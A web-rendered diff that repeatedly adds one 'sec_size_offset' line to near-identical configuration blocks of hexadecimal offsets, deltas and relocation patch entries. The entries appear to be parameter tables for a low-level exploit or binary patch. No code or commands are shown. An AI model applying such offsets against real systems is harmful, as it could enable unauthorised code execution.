|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7042e500
|
system_delta=0x7042e500
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
|
|||||||
system_delta=0x7043e4ff
|
system_delta=0x7043e4ff
|
||||||
command=P
|
command=P
|
||||||
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
off_io=-0x3690 off_sec=0xbb0 rbase=0x220
|
||||||
|
sec_size_offset=0x38
|
||||||
|
|
||||||
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
|
||||||
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3
|
||||||
|
|||||||
Reference in New Issue
Block a user